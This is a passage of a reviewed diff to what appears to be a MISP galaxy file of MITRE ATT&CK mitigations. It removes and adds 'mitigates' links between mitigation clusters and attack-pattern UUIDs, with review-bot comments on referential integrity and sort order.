- "type": "mitigates"
- },
{
"dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
"tags": [
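Review bot: `54456690-84de-4538-9101-643e26437e09` and `6aac77c4-eaf2-4366-8c13-ce50ab951f38` are removed here and again in the `@@ -5509,13 +4102,6 @@` and `@@ -5544,20 +4130,6 @@` hunks, and `54456690…` also leaves the Domain Generation Algorithms Mitigation (T1483) cluster earlier in the patch. Three removals of the same target strongly suggest the referenced cluster no longer exists upstream; if so, the commit message should list the retired target uuids so that MISP instances importing this galaxy can expect unresolved relationships for exactly those ids and nothing else.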
@@ -4624,6 +3413,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "ba04e672-da86-4e69-aa15-0eca5db25f43",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "be055942-6e63-49d7-9fa1-9cb7d8a8f3f4",
"tags": [
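Review bot: This is the only addition in the patch, a new `mitigates` link to `ba04e672-da86-4e69-aa15-0eca5db25f43`, so it deserves a referential-integrity check that the removals do not: confirm that uuid exists as a cluster in the target galaxy before merging. Its position is consistent with the list's ordering (`ba04…` sits before the following `be055942-6e63-49d7-9fa1-9cb7d8a8f3f4`), but the owning cluster is again outside the context lines, so the PR description should name which mitigation gained the link.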
@@ -4638,20 +3434,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "d21a2069-23d5-4043-ad6d-64f6b644cb1a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "d3df754e-997b-4cf9-97d4-70feb3120847",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6",
"tags": [
@@ -4707,15 +3489,7 @@
"https://attack.mitre.org/mitigations/T1104"
]
},
- "related": [
- {
- "dest-uuid": "84e02621-8fdf-470f-bd58-993bb6a89d91",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "514e7371-a344-4de7-8ec3-3aa42b801d52",
"value": "Multi-Stage Channels Mitigation - T1104"
},
@@ -4727,15 +3501,7 @@
"https://attack.mitre.org/mitigations/T1072"
]
},
- "related": [
- {
- "dest-uuid": "92a78814-b191-47ca-909c-1ccfe3777414",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "160af6af-e733-4b6a-a04a-71c620ac0930",
"value": "Third-party Software Mitigation - T1072"
},
@@ -4747,15 +3513,7 @@
"https://attack.mitre.org/mitigations/T1073"
]
},
- "related": [
- {
- "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "7a14d974-f3d9-4e4e-9b7d-980385762908",
"value": "DLL Side-Loading Mitigation - T1073"
},
@@ -4768,15 +3526,7 @@
"https://support.apple.com/en-us/HT204005"
]
},
- "related": [
- {
- "dest-uuid": "6a3be63a-64c5-4678-a036-03ff8fc35300",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "61d02387-351a-453e-a575-160a9abc3e04",
"value": "Re-opened Applications Mitigation - T1164"
},
@@ -4792,15 +3542,7 @@
"https://technet.microsoft.com/library/cc835085.aspx"
]
},
- "related": [
- {
- "dest-uuid": "1df0326d-2fbc-4d08-a16b-48365f1e742d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "b91c2f9e-c1a0-44df-95f0-9e7c9d1d5e55",
"value": "SID-History Injection Mitigation - T1178"
},
@@ -4812,15 +3554,7 @@
"https://attack.mitre.org/mitigations/T1188"
]
},
- "related": [
- {
- "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "752db800-ea54-4e7a-b4c1-2a0292350ea7",
"value": "Multi-hop Proxy Mitigation - T1188"
},
@@ -4836,15 +3570,7 @@
"https://en.wikipedia.org/wiki/Control-flow_integrity"
]
},
- "related": [
- {
- "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "7a4d0054-53cd-476f-88af-955dddc80ee0",
"value": "Drive-by Compromise Mitigation - T1189"
},
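Review bot: The removed target `d742a578-d70e-4d0e-96a6-02a9c30204e6` is still present as a kept context entry in the `@@ -4638,20 +3434,6 @@` hunk above, so the target cluster still exists; this hunk removes the edge only from the Drive-by Compromise Mitigation (T1189) side. That asymmetry (the cluster, its `value` and the control-flow-integrity reference stay, the relationship goes) is the specific thing the PR description should justify, because it is not explained by a target having disappeared.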
@@ -4857,15 +3583,7 @@
"https://attack.mitre.org/mitigations/T1001"
]
},
- "related": [
- {
- "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d0fcf37a-b6c4-4745-9c43-4fcdb8bfc88e",
"value": "Data Obfuscation Mitigation - T1001"
},
@@ -4878,15 +3596,7 @@
"https://www.us-cert.gov/ncas/alerts/TA15-314A"
]
},
- "related": [
- {
- "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "bcc91b8c-f104-4710-964e-1d5409666736",
"value": "Web Shell Mitigation - T1100"
},
@@ -4903,15 +3613,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "2497ac92-e751-4391-82c6-1b86e34d0294",
"value": "Automated Exfiltration Mitigation - T1020"
},
@@ -4924,15 +3626,7 @@
"https://en.wikipedia.org/wiki/IEEE_802.1X"
]
},
- "related": [
- {
- "dest-uuid": "d40239b3-05ff-46d8-9bdd-b46d13463ef9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "54e8722d-2faf-4b1b-93b6-6cbf9551669f",
"value": "Hardware Additions Mitigation - T1200"
},
@@ -4949,15 +3643,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "28adf6fd-ab6c-4553-9aa7-cef18a191f33",
"value": "Data Compressed Mitigation - T1002"
},
@@ -4981,15 +3667,7 @@
"https://technet.microsoft.com/library/jj865668.aspx"
]
},
- "related": [
- {
- "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "aeff5887-8f9e-48d5-a523-9b395e2ce80a",
"value": "Credential Dumping Mitigation - T1003"
},
@@ -5068,15 +3746,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "46b7ef91-4e1d-43c5-a2eb-00fa9444f6f4",
"value": "Network Sniffing Mitigation - T1040"
},
@@ -5093,15 +3763,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "b7b2c89c-09c1-4b71-ae7c-000ec2893aab",
"value": "New Service Mitigation - T1050"
},
@@ -5114,15 +3776,7 @@
"https://attack.mitre.org/mitigations/T1008"
]
},
- "related": [
- {
- "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "515f6584-fa98-44fe-a4e8-e428c7188514",
"value": "Fallback Channels Mitigation - T1008"
},
@@ -5139,15 +3793,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "519630c5-f03f-4882-825c-3af924935817",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "16a8ac85-a06f-460f-ad22-910167bd7332",
"value": "Binary Padding Mitigation - T1009"
},
@@ -5182,15 +3828,7 @@
"https://pages.nist.gov/800-63-3/sp800-63b.html"
]
},
- "related": [
- {
- "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "4a99fecc-680b-448e-8fe7-8144c60d272c",
"value": "Brute Force Mitigation - T1110"
},
@@ -5207,15 +3845,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "0640214c-95af-4c04-a574-2a1ba6dda00b",
"value": "Query Registry Mitigation - T1012"
},
@@ -5228,15 +3858,7 @@
"https://attack.mitre.org/mitigations/T1102"
]
},
- "related": [
- {
- "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "4689b9fb-dca4-473e-831b-34717ad50c97",
"value": "Web Service Mitigation - T1102"
},
@@ -5376,15 +3998,7 @@
"https://attack.mitre.org/mitigations/T1103"
]
},
- "related": [
- {
- "dest-uuid": "317fefa6-46c7-4062-adb6-2008cf6bcb41",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "10571bf2-8073-4edf-a71c-23bad225532e",
"value": "AppInit DLLs Mitigation - T1103"
},
@@ -5460,13 +4074,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7",
"tags": [
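Review bot: `3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d` is also dropped as the sole link of the Custom Cryptographic Protocol Mitigation (T1024) cluster earlier in this patch, so like the other repeated targets it should be verified as gone from the source rather than removed from one side only. Mechanically the hunk is fine: the surviving neighbour `4061e78c-1284-44b4-9116-73e4ac3912f7` keeps the list's lexical order.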
@@ -5474,20 +4081,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "428ca9f8-0e33-442a-be87-f869cb4cf73e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466",
"tags": [
@@ -5509,13 +4102,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "54456690-84de-4538-9101-643e26437e09",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b",
"tags": [
@@ -5544,20 +4130,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea",
"tags": [
@@ -5614,13 +4186,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "9a60a291-8960-4387-8a4a-2ab5c18bb50b",
"tags": [
@@ -5684,13 +4249,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "be055942-6e63-49d7-9fa1-9cb7d8a8f3f4",
"tags": [
@@ -5733,13 +4291,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "cabe189c-a0e3-4965-a473-dcff00f17213",
"tags": [
@@ -5824,13 +4375,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7",
"tags": [
@@ -5865,15 +4409,7 @@
"https://attack.mitre.org/mitigations/T1013"
]
},
- "related": [
- {
- "dest-uuid": "1f47e2fd-fa77-4f2f-88ee-e85df308f125",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "1c6bc7f3-d517-4971-aed4-8f939090846b",
"value": "Port Monitors Mitigation - T1013"
},
@@ -5907,13 +4443,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "0bf78622-e8d2-41da-a857-731472d61a92",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f",
"tags": [
@@ -5935,13 +4464,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "27960489-4e7f-461d-a62a-f5c0cb521e4a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "2bce5b30-7014-4a5d-ade7-12913fe6ac36",
"tags": [
@@ -5998,13 +4520,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "56ff457d-5e39-492b-974c-dfd2b8603ffe",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf",
"tags": [
@@ -6054,13 +4569,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "b39d03cb-7b98-41c4-a878-c40c1a913dc0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "b4694861-542c-48ea-9eb1-10d356e7140a",
"tags": [
@@ -6075,13 +4583,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "cc1e737c-236c-4e3b-83ba-32039a626ef8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "d0613359-5781-4fd2-b5be-c269270be1f6",
"tags": [
@@ -6144,13 +4645,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "1df0326d-2fbc-4d08-a16b-48365f1e742d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "1f9c2bae-b441-4f66-a8af-b65946ee72f2",
"tags": [
@@ -6215,7 +4709,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c",
+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
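Review bot: the single-line swap of a257ed11-ff3b-4216-8c9d-3938ef57064c for b17a1a56-e99c-403c-8948-561df0cffe81 is not an edit of one UUID but the diff's rendering of one relationship removed and a different one inserted into a sorted array (the next hunk does the same with ba8e391f-… and f232fa7a-…). Two things to confirm: that a257ed11-… is meant to lose this "mitigates" link (it is also removed outright from another element further down), and that b17a1a56-… exists as an attack-pattern element, since this patch only ever references it as a dest-uuid.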
@@ -6229,7 +4723,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c",
+ "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -6261,15 +4755,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c085476e-1964-4d7f-86e1-d8657a7741e8",
"value": "Accessibility Features Mitigation - T1015"
},
@@ -6293,15 +4779,7 @@
"https://attack.mitre.org/mitigations/T1501"
]
},
- "related": [
- {
- "dest-uuid": "0fff2797-19cb-41ea-a5f1-8a9303b8158e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "83130e62-bca6-4a81-bd4b-8e233bd49db6",
"value": "Systemd Service Mitigation - T1501"
},
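Review bot: 0fff2797-19cb-41ea-a5f1-8a9303b8158e is the only relationship of "Systemd Service Mitigation - T1501" and the same dest-uuid is removed from three other elements later in this patch, which is consistent with that attack-pattern having been revoked upstream. The patch gives no rationale for roughly two thousand deleted lines; a commit message naming the ATT&CK release this syncs against, and a grep confirming no other cluster still references 0fff2797-…, would make the bulk removal reviewable.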
@@ -6315,15 +4793,7 @@
"https://www.acunetix.com/websitesecurity/webserver-security/"
]
},
- "related": [
- {
- "dest-uuid": "804c042c-cfe6-449e-bc1a-ba0a998a70db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "43b366a4-b5ff-4d4e-8a3b-f09a9d2faff5",
"value": "Shared Webroot Mitigation - T1051"
},
@@ -6335,22 +4805,7 @@
"https://attack.mitre.org/mitigations/T1160"
]
},
- "related": [
- {
- "dest-uuid": "8faedf87-dceb-4c35-b2a2-7286f59a3bc3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "e99ec083-abdd-48de-ad87-4dbf6f8ba2a4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "402e92cd-5608-4f4b-9a34-a2c962e4bcd7",
"value": "Launch Daemon Mitigation - T1160"
},
@@ -6367,22 +4822,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "34efb2fd-4dc2-40d4-a564-0c147c85034d",
"value": "File Deletion Mitigation - T1107"
},
@@ -6423,20 +4863,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "0ca7beef-9bbc-4e35-97cf-437384ddce6a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "0fff2797-19cb-41ea-a5f1-8a9303b8158e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5",
"tags": [
@@ -6458,13 +4884,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "18d4ab39-12ed-4a16-9fdb-ae311bba4a0f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "1f9c2bae-b441-4f66-a8af-b65946ee72f2",
"tags": [
@@ -6500,13 +4919,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2ba5aa71-9d15-4b22-b726-56af06d9ad2f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "2db31dcd-54da-405d-acef-b9129b816ed6",
"tags": [
@@ -6528,13 +4940,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529",
"tags": [
@@ -6563,13 +4968,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "4ab929c6-ee2d-4fb5-aab4-b14be2ed7179",
"tags": [
@@ -6584,13 +4982,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "514ede4c-78b3-4d78-a38b-daddf6217a79",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814",
"tags": [
@@ -6598,13 +4989,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b",
"tags": [
@@ -6612,13 +4996,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "53bfc8bf-8f76-4cd7-8958-49a884ddb3ee",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "544b0346-29ad-41e1-a808-501bb4193f47",
"tags": [
@@ -6675,13 +5052,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf",
"tags": [
@@ -6696,13 +5066,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6a5848a8-6201-4a2c-8a6a-ca5af8c6f3df",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "6b57dc31-b814-4a03-8706-28bc20d739c4",
"tags": [
@@ -6760,7 +5123,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "804c042c-cfe6-449e-bc1a-ba0a998a70db",
+ "dest-uuid": "7c46b364-8496-4234-8a56-f7e6727e21e1",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -6822,13 +5185,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "8faedf87-dceb-4c35-b2a2-7286f59a3bc3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58",
"tags": [
@@ -6850,13 +5206,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd",
"tags": [
@@ -6879,14 +5228,14 @@
"type": "mitigates"
},
{
- "dest-uuid": "a1b52199-c8c5-438a-9ded-656f1d0888c6",
+ "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "mitigates"
},
{
- "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c",
+ "dest-uuid": "a1b52199-c8c5-438a-9ded-656f1d0888c6",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
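Review bot: the two consecutive swaps here are one net change, not two: a1b52199-c8c5-438a-9ded-656f1d0888c6 keeps its relationship and only shifts down a slot, a19e86f8-1c0a-4fea-8407-23b73d615776 is added, and a257ed11-ff3b-4216-8c9d-3938ef57064c is dropped. Reading it as two UUID edits would be misleading in a changelog; the intended change should be stated as "add a19e86f8, remove a257ed11". Sorted order still holds (a19e… sorts before a1b5…).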
@@ -6906,13 +5255,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "aa8bfbc9-78dc-41a4-a03b-7453e0fdccda",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579",
"tags": [
@@ -6948,27 +5290,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c0a384a4-9a25-40e1-97b6-458388474bc8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c4ad009b-6e13-4419-8d21-918a1652de02",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7",
"tags": [
@@ -7032,13 +5353,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "dfefe2ed-4389-4318-8762-f0272b350a1b",
"tags": [
@@ -7081,20 +5395,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "e906ae4d-1d3a-4675-be23-22f7311c0da4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "e99ec083-abdd-48de-ad87-4dbf6f8ba2a4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf",
"tags": [
@@ -7137,6 +5437,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "f8ef3a62-3f44-40a4-abca-761ab235c436",
"tags": [
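Review bot: f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a is introduced here as a new dest-uuid, but nothing in this patch shows it being defined; confirm it exists as an attack-pattern element before merge, because a dangling reference passes JSON validation and only surfaces later as an unresolved link in the galaxy view. The same check applies to the other pure insertions in this patch (8861073d-…, d94b3ae9-…). Sort order is preserved here (f5d8… before f8ef…).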
@@ -7169,15 +5476,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "f9b3e5d9-7454-4b7d-bce6-27620e19924e",
"value": "Redundant Access Mitigation - T1108"
},
@@ -7189,22 +5488,7 @@
"https://attack.mitre.org/mitigations/T1109"
]
},
- "related": [
- {
- "dest-uuid": "10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "791481f8-e96a-41be-b089-a088763083d4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
